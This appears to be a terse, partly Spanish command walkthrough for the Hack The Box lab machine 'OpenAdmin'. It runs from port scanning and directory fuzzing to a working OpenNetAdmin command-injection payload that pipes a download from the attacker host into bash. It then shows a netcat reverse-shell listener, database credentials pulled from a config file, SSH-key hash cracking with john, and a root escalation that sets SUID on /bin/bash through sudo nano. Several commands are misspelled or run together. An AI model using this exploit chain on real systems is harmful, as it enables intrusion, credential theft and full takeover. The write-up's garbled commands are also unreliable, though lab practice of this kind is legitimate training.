OpenAdmin

nmap -A -p- -oA openadmin 10.129.247.237 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA openadmin 10.129.247.237

nmap -sU -O -p- -oA openadmin-udp 10.129.247.237

nikto -h 10.129.247.237:80

nmap -sCV -p80,443 10.129.247.237 -oN targeted

whatweb http://10.129.247.237

wfuzz -c -t 200 —hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.247.237/FUZZ

http://10.129.247.237/artwork

http://10.129.247.237/music y le damos click a login

searchsploit poennetadmin

searchsploit -m 47691

curl —silent -d “xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo “BEGIN”;curl 10.10.14.92|bash;echo “END”&xajaxargs[]=ping” “http:10.129.247.237/ona” python3 -m http.server 80

nc -lvnp 443

find -name user.txt 2>/dev/null

cd /opt/ona/www

find -type f 2>/dev/null | grep “config”

cat ./local/config/database_settings.inc.php

credenciales jimmy:n1nj4W4rri)R!

su jimmy

cat main.php

curl localhost:52846/main.php

Copiamos la llave y lo ponemos en id_rsa

/usr/share/john/ssh2john.py id_rsa

/usr/share/john/ssh2john.py id_rsa > hash

credenciales joanna:bloodninjas

john —wordlist=/usr/share/wordlists/rockyou.txt hash chmod 600 id_rsa

ssh -i id_rsa joana@10.129.247.237

sudo -l

sudo -u root nano /opt/priv

Ctrl R + Ctrl X

En nano ejecutamos chmod 4755 /bin/bash

bash -p